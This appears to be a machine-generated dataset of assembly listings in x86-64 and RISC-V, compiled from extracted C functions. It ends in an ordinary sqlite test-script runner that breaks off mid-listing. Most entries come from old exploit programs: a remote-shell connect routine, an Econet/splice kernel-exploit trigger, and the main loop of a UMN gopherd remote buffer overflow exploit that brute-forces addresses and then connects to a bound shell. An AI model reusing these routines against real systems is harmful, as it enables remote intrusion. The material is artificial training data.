.file "extr_3821.c_getshell_conn_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "getshell_conn(): socket() failed." .align 3 .LC1: .string "getshell_conn(): couldn't resolve." .align 3 .LC2: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC3: .string "[!] connection failed: %s:%d.\n" .align 3 .LC4: .string "[*] successfully connected: %s:%d.\n\n" .text .align 1 .globl getshell_conn .type getshell_conn, @function getshell_conn: addi sp,sp,-96 sd s0,80(sp) lla s0,.LANCHOR0 sd s1,72(sp) sd s2,64(sp) lw a2,0(s0) mv s1,a0 mv s2,a1 lw a0,8(s0) lw a1,4(s0) sd s4,48(sp) la s4,__stack_chk_guard ld a5, 0(s4) sd a5, 24(sp) li a5, 0 sd s3,56(sp) sd ra,88(sp) sd s5,40(sp) call socket@plt li a5,-1 mv s3,a0 beq a0,a5,.L15 .L2: lw a5,8(s0) mv a0,s1 sw a5,16(sp) call inet_addr@plt sw a0,12(sp) bne a0,zero,.L16 .L3: mv a0,s2 call htons@plt mv a5,a0 lw a1,12(s0) lw a0,16(s0) sw a5,8(sp) call signal@plt mv a2,s2 mv a1,s1 lla a0,.LC2 call printf@plt lw a0,20(s0) call alarm@plt li a2,12 addi a1,sp,8 mv a0,s3 call connect@plt bne a0,zero,.L17 .L5: li a0,0 call alarm@plt mv a2,s2 mv a1,s1 lla a0,.LC4 call printf@plt ld a4, 24(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L18 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s4,48(sp) ld s5,40(sp) mv a0,s3 ld s3,56(sp) addi sp,sp,96 jr ra .L16: mv a0,s1 call gethostbyname@plt mv s5,a0 beq a0,zero,.L19 .L4: ld a1,0(s5) li a2,4 addi a0,sp,12 call memcpy@plt j .L3 .L17: mv a2,s2 mv a1,s1 lla a0,.LC3 call printf@plt li a0,1 call exit@plt j .L5 .L15: li a1,1 lla a0,.LC0 call printe@plt j .L2 .L19: li a1,1 lla a0,.LC1 call printe@plt j .L4 .L18: call __stack_chk_fail@plt .size getshell_conn, .-getshell_conn .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIGALRM .globl IPPROTO_TCP .globl AF_INET .globl g_aug_volatile_7762 .data .align 2 .type g_aug_volatile_7762, @object .size g_aug_volatile_7762, 4 g_aug_volatile_7762: .word 6 .bss .align 2 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_15704.c_trigger_aug_v3_5
.file "extr_15704.c_trigger_aug_v3_5.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "eth0" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*] Failed to set Econet address.\n" .text .p2align 4 .globl trigger .type trigger, @function trigger: .LFB1: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 xorl %esi, %esi movl $4, %edx pushq %rbx .cfi_def_cfa_offset 24 .cfi_offset 3, -24 movq %rdi, %rbx subq $24, %rsp .cfi_def_cfa_offset 48 movq %fs:40, %rax movq %rax, 8(%rsp) xorl %eax, %eax leaq 4(%rsp), %r12 movq %r12, %rdi call memset@PLT movl IFNAMSIZ(%rip), %edx movl 4(%rsp), %edi leaq .LC0(%rip), %rsi call strncpy@PLT movl 8(%rbx), %edi movl SIOCSIFADDR(%rip), %esi movq %r12, %rdx call ioctl@PLT testl %eax, %eax js .L6 movl 4(%rbx), %edx movl 12(%rbx), %edi xorl %r9d, %r9d movl $128, %r8d xorl %ecx, %ecx xorl %esi, %esi call splice@PLT movl (%rbx), %edi movl 8(%rbx), %edx xorl %r9d, %r9d movl $128, %r8d xorl %ecx, %ecx xorl %esi, %esi call splice@PLT xorl %edi, %edi call exit@PLT .L1: movq 8(%rsp), %rdx subq %fs:40, %rdx jne .L7 addq $24, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 popq %rbx .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L6: .cfi_restore_state leaq .LC1(%rip), %rdi call printf@PLT movl $-1, %eax jmp .L1 .L7: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size trigger, .-trigger .globl SIOCSIFADDR .bss .align 4 .type SIOCSIFADDR, @object .size SIOCSIFADDR, 4 SIOCSIFADDR: .zero 4 .globl IFNAMSIZ .align 4 .type IFNAMSIZ, @object .size IFNAMSIZ, 4 IFNAMSIZ: .zero 4 .globl g_aug_volatile_2838 .align 4 .type g_aug_volatile_2838, @object .size g_aug_volatile_2838, 4 g_aug_volatile_2838: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_15704.c_trigger_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "eth0" .align 3 .LC1: .string "[*] Failed to set Econet address.\n" .text .align 1 .globl trigger .type trigger, @function trigger: addi sp,sp,-64 sd s1,40(sp) sd s2,32(sp) mv s1,sp la s2,__stack_chk_guard sd s0,48(sp) li a2,4 mv s0,a0 li a1,0 ld a5, 0(s2) sd a5, 8(sp) li a5, 0 mv a0,s1 sd ra,56(sp) sd s3,24(sp) call memset@plt lla s3,.LANCHOR0 lw a2,0(s3) lw a0,0(sp) lla a1,.LC0 call strncpy@plt lw a1,4(s3) lw a0,8(s0) mv a2,s1 call ioctl@plt blt a0,zero,.L6 lw a2,4(s0) lw a0,12(s0) li a5,0 li a4,128 li a3,0 li a1,0 call splice@plt lw a2,8(s0) lw a0,0(s0) li a5,0 li a4,128 li a3,0 li a1,0 call splice@plt li a0,0 call exit@plt .L1: ld a4, 8(sp) ld a5, 0(s2) xor a5, a4, a5 li a4, 0 bne a5,zero,.L7 ld ra,56(sp) ld s0,48(sp) ld s1,40(sp) ld s2,32(sp) ld s3,24(sp) addi sp,sp,64 jr ra .L6: lla a0,.LC1 call printf@plt li a0,-1 j .L1 .L7: call __stack_chk_fail@plt .size trigger, .-trigger .globl SIOCSIFADDR .globl IFNAMSIZ .globl g_aug_volatile_2838 .bss .align 2 .set .LANCHOR0,. + 0 .type IFNAMSIZ, @object .size IFNAMSIZ, 4 IFNAMSIZ: .zero 4 .type SIOCSIFADDR, @object .size SIOCSIFADDR, 4 SIOCSIFADDR: .zero 4 .type g_aug_volatile_2838, @object .size g_aug_volatile_2838, 4 g_aug_volatile_2838: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_840.c_readout_aug_v3_1
.file "extr_840.c_readout_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*] Output by %s:\n\n" .LC1: .string "\n" .text .p2align 4 .globl readout .type readout, @function readout: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 movl %edi, %r13d pushq %r12 pushq %rbx subq $24, %rsp .cfi_offset 12, -48 .cfi_offset 3, -56 movq %fs:40, %rax movq %rax, -56(%rbp) xorl %eax, %eax movslq BUFF(%rip), %rax movq %rsp, %rcx addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L18: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L18 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L19 .L4: movq 8(%rsi), %rsi leaq .LC0(%rip), %rdi xorl %eax, %eax movq %rsp, %r12 xorl %ebx, %ebx leaq -57(%rbp), %r15 call printf@PLT jmp .L5 .p2align 4,,10 .p2align 3 .L6: testl %r14d, %r14d je .L20 .L7: addq $1, %rbx .L5: movl BANSTART(%rip), %esi movq %r12, %rdi call strstr@PLT testq %rax, %rax jne .L21 movl $1, %edx movq %r15, %rsi movl %r13d, %edi call read@PLT movl %eax, %r14d movzbl -57(%rbp), %eax movb %al, (%r12,%rbx) leal 1(%rbx), %eax cmpl %eax, BUFF(%rip) jg .L6 xorl %eax, %eax call errbuff@PLT testl %r14d, %r14d jne .L7 .L20: xorl %eax, %eax call errsplo@PLT jmp .L7 .p2align 4,,10 .p2align 3 .L21: leal 1(%rbx), %ebx leaq -57(%rbp), %r14 movslq %ebx, %rbx jmp .L9 .p2align 4,,10 .p2align 3 .L10: addq $1, %rbx .L9: movl BANSTOP(%rip), %esi movq %r12, %rdi call strstr@PLT testq %rax, %rax jne .L22 movl $1, %edx movq %r14, %rsi movl %r13d, %edi call read@PLT movsbl -57(%rbp), %edi movb %dil, -1(%r12,%rbx) call putchar@PLT cmpl %ebx, BUFF(%rip) jg .L10 xorl %eax, %eax call errbuff@PLT jmp .L10 .p2align 4,,10 .p2align 3 .L22: leaq .LC1(%rip), %rdi call puts@PLT movq -56(%rbp), %rax subq %fs:40, %rax jne .L23 leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .p2align 4,,10 .p2align 3 .L19: .cfi_restore_state orq $0, -8(%rsp,%rdx) jmp .L4 .L23: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size readout, .-readout .globl BUFF .bss .align 4 .type BUFF, @object .size BUFF, 4 BUFF: .zero 4 .globl BANSTOP .align 4 .type BANSTOP, @object .size BANSTOP, 4 BANSTOP: .zero 4 .globl BANSTART .align 4 .type BANSTART, @object .size BANSTART, 4 BANSTART: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_840.c_readout_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] Output by %s:\n\n" .align 3 .LC1: .string "\n" .text .align 1 .globl readout .type readout, @function readout: addi sp,sp,-96 sd s0,80(sp) sd s1,72(sp) addi s0,sp,96 sd s3,56(sp) sd s4,48(sp) sd s5,40(sp) sd s6,32(sp) sd s7,24(sp) sd s8,16(sp) sd ra,88(sp) sd s2,64(sp) lla s3,.LANCHOR0 lw a5,0(s3) ld a1,8(a1) la s7,__stack_chk_guard addi a5,a5,15 andi a5,a5,-16 sub sp,sp,a5 mv s6,a0 ld a5, 0(s7) sd a5, -88(s0) li a5, 0 lla a0,.LC0 call printf@plt lw a1,4(s3) mv s4,sp mv a0,s4 mv s5,sp li s1,0 addi s8,s0,-89 call strstr@plt bne a0,zero,.L12 .L5: li a2,1 mv a1,s8 mv a0,s6 call read@plt lbu a4,-89(s0) lw a5,0(s3) addiw s1,s1,1 sb a4,0(s5) mv s2,a0 ble a5,s1,.L13 beq s2,zero,.L14 .L4: addi s5,s5,1 .L18: lw a1,4(s3) mv a0,s4 call strstr@plt beq a0,zero,.L5 .L12: lw a1,8(s3) mv a0,s4 addiw s1,s1,1 addi s2,s0,-89 call strstr@plt bne a0,zero,.L15 .L8: li a2,1 mv a1,s2 mv a0,s6 call read@plt lbu a0,-89(s0) add a5,s4,s1 sb a0,-1(a5) call putchar@plt lw a4,0(s3) sext.w a5,s1 ble a4,a5,.L16 addi s1,s1,1 .L19: lw a1,8(s3) mv a0,s4 call strstr@plt beq a0,zero,.L8 .L15: lla a0,.LC1 call puts@plt ld a4, -88(s0) ld a5, 0(s7) xor a5, a4, a5 li a4, 0 bne a5,zero,.L17 addi sp,s0,-96 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) ld s6,32(sp) ld s7,24(sp) ld s8,16(sp) addi sp,sp,96 jr ra .L14: call errsplo@plt addi s5,s5,1 j .L18 .L13: call errbuff@plt bne s2,zero,.L4 j .L14 .L16: call errbuff@plt addi s1,s1,1 j .L19 .L17: call __stack_chk_fail@plt .size readout, .-readout .globl BUFF .globl BANSTOP .globl BANSTART .bss .align 2 .set .LANCHOR0,. + 0 .type BUFF, @object .size BUFF, 4 BUFF: .zero 4 .type BANSTART, @object .size BANSTART, 4 BANSTART: .zero 4 .type BANSTOP, @object .size BANSTOP, 4 BANSTOP: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22894.c_main_aug_v3_7
.file "extr_22894.c_main_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "!" .LC1: .string "." .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string "[*] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.\n[*] \"UMN gopherd remote GSisText()/view buffer overflow\"\n[*] by: vade79/v9 [email protected] (fakehalo)\n" .align 8 .LC3: .string "[!] syntax: %s <hostname[:port]>\n\n" .align 8 .LC4: .string "main(): allocating memory failed" .align 8 .LC5: .string "[*] target: %s:%d - brute: 0x%.8x-0x%.8x\n\n" .section .rodata.str1.1 .LC6: .string "(. = 29 byte offset): " .LC7: .string "(brute force limit hit)\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 movq %rsi, %r12 pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 movl %edi, %ebx leaq .LC2(%rip), %rdi call puts@PLT cmpl $1, %ebx jle .L23 .L2: movq 8(%r12), %rdi call strdup@PLT movq %rax, %rbx testq %rax, %rax je .L24 .L3: xorl %ebp, %ebp jmp .L4 .p2align 4,,10 .p2align 3 .L6: movl %ebp, %eax addq %rbx, %rax cmpb $58, (%rax) jne .L5 movb $0, (%rax) .L5: subl $1, %ebp .L4: movq %rbx, %rdi call strlen@PLT cmpl %ebp, %eax ja .L6 movq 8(%r12), %rdi movl $58, %esi call index@PLT testq %rax, %rax jne .L7 .L9: movl $70, %r12d .L8: movl ENDADDR(%rip), %r8d movl %r12d, %edx movq %rbx, %rsi xorl %eax, %eax movl BASEADDR(%rip), %ecx leaq .LC5(%rip), %rdi xorl %ebp, %ebp leaq .LC0(%rip), %r14 leaq .LC1(%rip), %r13 call printf@PLT movl sig_ctrlc(%rip), %esi movl SIGINT(%rip), %edi call signal@PLT movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi call signal@PLT movl stderr(%rip), %edi leaq .LC6(%rip), %rsi call fprintf@PLT movl BASEADDR(%rip), %eax cmpl %eax, ENDADDR(%rip) jbe .L12 .p2align 4,,10 .p2align 3 .L10: movl %ebp, %edx movl %r12d, %esi movq %rbx, %rdi call gopher_connect@PLT movq %r13, %rsi movl stderr(%rip), %edi testq %rax, %rax cmovne %r14, %rsi addl $29, %ebp call fprintf@PLT movl $45295, %esi movq %rbx, %rdi call getshell@PLT movl BASEADDR(%rip), %eax addl %ebp, %eax cmpl ENDADDR(%rip), %eax jb .L10 .L12: movl stderr(%rip), %edi leaq .LC7(%rip), %rsi call fprintf@PLT xorl %edi, %edi call exit@PLT popq %rbx .cfi_remember_state .cfi_def_cfa_offset 40 xorl %eax, %eax popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .L24: .cfi_restore_state movl $1, %esi leaq .LC4(%rip), %rdi call printe@PLT jmp .L3 .L7: movq 8(%r12), %rdi movl $58, %esi call index@PLT leaq 1(%rax), %rdi call atoi@PLT testw %ax, %ax je .L9 movzwl %ax, %r12d jmp .L8 .L23: movq (%r12), %rsi leaq .LC3(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call exit@PLT jmp .L2 .cfi_endproc .LFE1: .size main, .-main .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl sig_ctrlc .align 4 .type sig_ctrlc, @object .size sig_ctrlc, 4 sig_ctrlc: .zero 4 .globl sig_alarm .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl SIGINT .align 4 .type SIGINT, @object .size SIGINT, 4 SIGINT: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl ENDADDR .align 4 .type ENDADDR, @object .size ENDADDR, 4 ENDADDR: .zero 4 .globl BASEADDR .align 4 .type BASEADDR, @object .size BASEADDR, 4 BASEADDR: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22894.c_main_aug_v3_7.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "!" .align 3 .LC1: .string "." .align 3 .LC2: .string "[*] UMN gopherd[2.x.x/3.x.x]: remote buffer overflow exploit.\n[*] \"UMN gopherd remote GSisText()/view buffer overflow\"\n[*] by: vade79/v9 [email protected] (fakehalo)\n" .align 3 .LC3: .string "[!] syntax: %s <hostname[:port]>\n\n" .align 3 .LC4: .string "main(): allocating memory failed" .align 3 .LC5: .string "[*] target: %s:%d - brute: 0x%.8x-0x%.8x\n\n" .align 3 .LC6: .string "(. = 29 byte offset): " .align 3 .LC7: .string "(brute force limit hit)\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-80 sd s0,64(sp) mv s0,a0 lla a0,.LC2 sd s3,40(sp) sd ra,72(sp) sd s1,56(sp) sd s2,48(sp) sd s4,32(sp) sd s5,24(sp) sd s6,16(sp) sd s7,8(sp) mv s3,a1 call puts@plt li a5,1 ble s0,a5,.L23 .L2: ld a0,8(s3) call strdup@plt mv s1,a0 beq a0,zero,.L24 .L3: li s0,0 li s2,58 .L4: mv a0,s1 call strlen@plt slli a5,s0,32 srli a5,a5,32 sext.w a0,a0 add a5,s1,a5 bleu a0,s0,.L25 .L6: lbu a4,0(a5) addiw s0,s0,-1 bne a4,s2,.L4 sb zero,0(a5) mv a0,s1 call strlen@plt slli a5,s0,32 srli a5,a5,32 sext.w a0,a0 add a5,s1,a5 bgtu a0,s0,.L6 .L25: ld a0,8(s3) li a1,58 call index@plt bne a0,zero,.L7 .L9: li a2,70 li s4,70 .L8: lla s2,.LANCHOR0 lw a4,0(s2) lw a3,4(s2) mv a1,s1 lla a0,.LC5 call printf@plt lw a1,8(s2) lw a0,12(s2) li s0,0 call signal@plt lw a1,16(s2) lw a0,20(s2) call signal@plt lw a0,24(s2) lla a1,.LC6 call fprintf@plt lw a4,0(s2) lw a5,4(s2) bleu a4,a5,.L12 li s3,45056 lla s5,.LC0 lla s6,.LC1 addi s3,s3,239 .L10: lw s7,24(s2) mv a1,s4 mv a2,s0 mv a0,s1 call gopher_connect@plt mv a5,a0 mv a1,s5 mv a0,s7 bne a5,zero,.L11 mv a1,s6 .L11: call fprintf@plt mv a1,s3 mv a0,s1 call getshell@plt lw a5,4(s2) lw a4,0(s2) addiw s0,s0,29 addw a5,s0,a5 bltu a5,a4,.L10 .L12: lw a0,24(s2) lla a1,.LC7 call fprintf@plt li a0,0 call exit@plt ld ra,72(sp) ld s0,64(sp) ld s1,56(sp) ld s2,48(sp) ld s3,40(sp) ld s4,32(sp) ld s5,24(sp) ld s6,16(sp) ld s7,8(sp) li a0,0 addi sp,sp,80 jr ra .L24: li a1,1 lla a0,.LC4 call printe@plt j .L3 .L7: ld a0,8(s3) li a1,58 call index@plt addi a0,a0,1 call atoi@plt mv s4,a0 beq a0,zero,.L9 sext.w a2,a0 j .L8 .L23: ld a1,0(s3) lla a0,.LC3 call printf@plt li a0,1 call exit@plt j .L2 .size main, .-main .globl stderr .globl sig_ctrlc .globl sig_alarm .globl SIGINT .globl SIGALRM .globl ENDADDR .globl BASEADDR .bss .align 2 .set .LANCHOR0,. + 0 .type ENDADDR, @object .size ENDADDR, 4 ENDADDR: .zero 4 .type BASEADDR, @object .size BASEADDR, 4 BASEADDR: .zero 4 .type sig_ctrlc, @object .size sig_ctrlc, 4 sig_ctrlc: .zero 4 .type SIGINT, @object .size SIGINT, 4 SIGINT: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_mptest.c_runScript_aug_v3_7
.file "extr_mptest.c_runScript_aug_v3_7.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "%.*s" .LC1: .string "sleep" .LC2: .string "exit" .LC3: .string "testcase" .LC4: .string "finish" .LC5: .string "reset" .LC6: .string "match" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC7: .string "line %d of %s:\nExpected [%.*s]\n Got [%s]" .section .rodata.str1.1 .LC8: .string "glob" .LC9: .string "notglob" .section .rodata.str1.8 .align 8 .LC10: .string "line %d of %s:\nExpected [%s]\n Got [%s]" .section .rodata.str1.1 .LC11: .string "output" .LC12: .string "%s" .LC13: .string "source" .LC14: .string "%.*s/%s" .LC15: .string "begin script [%s]\n" .LC16: .string "end script [%s]\n" .LC17: .string "print" .LC18: .string "if" .LC19: .string "SELECT %.*s" .LC20: .string "else" .LC21: .string "endif" .LC22: .string "start" .LC23: .string "wait" .LC24: .string "line %d of %s\n" .LC25: .string "task" .section .rodata.str1.8 .align 8 .LC26: .string "line %d of %s: bad client number: %d" .section .rodata.str1.1 .LC27: .string "%s:%d" .section .rodata.str1.8 .align 8 .LC28: .string "INSERT INTO task(client,script,name) VALUES(%d,'%q',%Q)" .section .rodata.str1.1 .LC29: .string "breakpoint" .LC30: .string "show-sql-errors" .section .rodata.str1.8 .align 8 .LC31: .string "line %d of %s: unknown command --%s" .text .p2align 4 .type runScript, @function runScript: .LFB24: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 pushq %rbx subq $1176, %rsp .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 .cfi_offset 3, -56 movq %rdx, -1112(%rbp) movq %rcx, -1184(%rbp) movq %rsp, %rcx movl %edi, -1152(%rbp) movl %esi, -1188(%rbp) movq %fs:40, %rax movq %rax, -56(%rbp) xorl %eax, %eax movslq MX_ARG(%rip), %rax movl $1, -1100(%rbp) leaq (%rax,%rax,4), %rax leaq (%rax,%rax,4), %rax leaq 15(,%rax,4), %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L130: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L130 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L131 .L4: leaq -1096(%rbp), %rax movl $8, %edx xorl %esi, %esi movq %rsp, -1208(%rbp) movq %rax, %rbx movq %rax, %rdi movq %rax, -1176(%rbp) call memset@PLT movq %rbx, %rdi call stringReset@PLT movq -1112(%rbp), %r13 movsbl 0(%r13), %ebx testl %ebx, %ebx je .L6 leaq -1100(%rbp), %rax movq %r13, %r14 movl $0, -1148(%rbp) movl $0, -1116(%rbp) movq $0, -1128(%rbp) movq %rax, -1136(%rbp) .L5: movl -1100(%rbp), %eax movq -1136(%rbp), %rsi movq %r14, %rdi movl %eax, -1140(%rbp) call tokenLength@PLT movl %ebx, %edi movl %eax, -1120(%rbp) call ISSPACE@PLT testq %rax, %rax jne .L7 cmpl $47, %ebx je .L7 cmpl $45, %ebx jne .L7 movq -1112(%rbp), %rax movq -1128(%rbp), %rsi cmpb $45, 1(%rax,%rsi) je .L132 .L7: movl -1120(%rbp), %ecx addl %ecx, -1116(%rbp) .L9: movslq -1116(%rbp), %rax movq -1112(%rbp), %r14 addq %rax, %r14 movq %rax, -1128(%rbp) movsbl (%r14), %ebx testl %ebx, %ebx jne .L5 movl -1116(%rbp), %ecx movl -1148(%rbp), %ebx cmpl %ebx, %ecx jle .L6 movq -1112(%rbp), %rdx movl %ecx, %esi movslq %ebx, %rax leaq .LC0(%rip), %rdi subl %ebx, %esi addq %rax, %rdx xorl %eax, %eax call sqlite3_mprintf@PLT movq %rax, %rdi movq %rax, %r12 xorl %eax, %eax call runSql@PLT movq %r12, %rdi call sqlite3_free@PLT .L6: movq -1176(%rbp), %rdi call stringFree@PLT movq -56(%rbp), %rax subq %fs:40, %rax jne .L133 leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .p2align 4,,10 .p2align 3 .L132: .cfi_restore_state movq -1112(%rbp), %r13 movq %rsi, %rax addq $2, %rax addq %rax, %r13 movq %rax, -1160(%rbp) movsbl 0(%r13), %edi call isalpha@PLT testl %eax, %eax je .L7 movl -1116(%rbp), %ecx cmpl %ecx, -1148(%rbp) jl .L134 .L11: cmpl $1, g(%rip) jle .L12 movl -1120(%rbp), %esi movq %r14, %rdx leaq .LC0(%rip), %rdi xorl %eax, %eax call logMessage@PLT .L12: movl -1120(%rbp), %eax movl $30, %ecx movq %r13, %rdi leal -2(%rax), %r12d leaq -1088(%rbp), %rax movq %rax, %rdx movl %r12d, %esi movq %rax, -1216(%rbp) call extractToken@PLT movl %eax, %edx cmpl %eax, %r12d jle .L75 movslq -1116(%rbp), %rax movq %r14, -1200(%rbp) movl $0, -1144(%rbp) movq -1208(%rbp), %r15 movq %rax, -1168(%rbp) .p2align 4,,10 .p2align 3 .L14: movl -1144(%rbp), %eax cmpl %eax, MX_ARG(%rip) jle .L123 movq -1112(%rbp), %r13 movslq %edx, %r14 addq -1168(%rbp), %r13 .p2align 4,,10 .p2align 3 .L21: movsbl 2(%r13,%r14), %edi call ISSPACE@PLT testq %rax, %rax je .L135 addq $1, %r14 cmpl %r14d, %r12d jg .L21 .L122: movq -1200(%rbp), %r14 .L13: movl MX_ARG(%rip), %edx cmpl %edx, -1144(%rbp) jge .L20 movslq -1144(%rbp), %rax subl $1, %edx movq -1208(%rbp), %rbx movq %rax, %rsi leaq (%rax,%rax,4), %rax subl %esi, %edx leaq (%rax,%rax,4), %rcx shrl %edx salq $2, %rcx leaq (%rdx,%rdx,4), %rdx leaq (%rbx,%rcx), %rax leaq (%rdx,%rdx,4), %rsi leaq 200(%rbx,%rcx), %rdx leaq (%rdx,%rsi,8), %rdx .p2align 4,,10 .p2align 3 .L22: movb $0, (%rax) addq $200, %rax cmpq %rax, %rdx jne .L22 .L20: movq -1216(%rbp), %rdi leaq .LC1(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L136 movq -1208(%rbp), %rdi call atoi@PLT movl %eax, %edi call sqlite3_sleep@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx .L23: movl %ebx, -1116(%rbp) jmp .L9 .p2align 4,,10 .p2align 3 .L131: orq $0, -8(%rsp,%rdx) jmp .L4 .p2align 4,,10 .p2align 3 .L135: cmpl %r14d, %r12d jle .L122 movl %r12d, %esi movq %r15, %rdx movslq %r14d, %rdi movl $100, %ecx addq -1160(%rbp), %rdi subl %r14d, %esi subq $100, %r15 addq -1112(%rbp), %rdi call extractToken@PLT subl $1, -1144(%rbp) leal (%rax,%r14), %edx cmpl %edx, %r12d jg .L14 jmp .L122 .L136: movq -1216(%rbp), %rdi leaq .LC2(%rip), %rsi call strcmp@PLT testq %rax, %rax je .L137 movq -1216(%rbp), %rdi leaq .LC3(%rip), %rsi call strcmp@PLT testq %rax, %rax jne .L26 cmpl $1, g(%rip) je .L138 .L128: movq -1176(%rbp), %rdi call stringReset@PLT movl -1116(%rbp), %eax movl -1120(%rbp), %ecx leal (%rax,%rcx), %ebx jmp .L23 .L123: movq -1200(%rbp), %r14 jmp .L20 .L134: movslq -1148(%rbp), %rdx movl %ecx, %esi leaq .LC0(%rip), %rdi movl %ecx, %ebx movq %rdx, %rax addq -1112(%rbp), %rdx subl %eax, %esi xorl %eax, %eax call sqlite3_mprintf@PLT movq 